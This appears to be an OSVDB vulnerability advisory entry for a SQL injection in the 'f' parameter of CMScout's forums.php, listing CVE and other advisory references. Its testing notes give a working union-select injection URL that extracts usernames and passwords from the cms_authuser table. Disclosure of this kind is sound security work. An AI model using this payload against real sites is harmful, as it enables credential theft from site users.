CMScout forums.php f Variable SQL Injection

2007-07-13T17:07:54
ID OSVDB:36242
Type osvdb
Reporter FiSh()
Modified 2007-07-13T17:07:54

Description

Manual Testing Notes

http://[target]/index.php?page=forums&f=1//union//all//select//0,uname,passwd,2,3,4,5,6,7,8//from//cms_authuser/*

References:

Secunia Advisory ID: 26026
Other Advisory URL: http://packetstorm.linuxsecurity.com/0707-exploits/cmscout.txt
ISS X-Force ID: 35393
Generic Exploit URL: http://www.milw0rm.com/exploits/4182
CVE-2007-3812
Bugtraq ID: 24906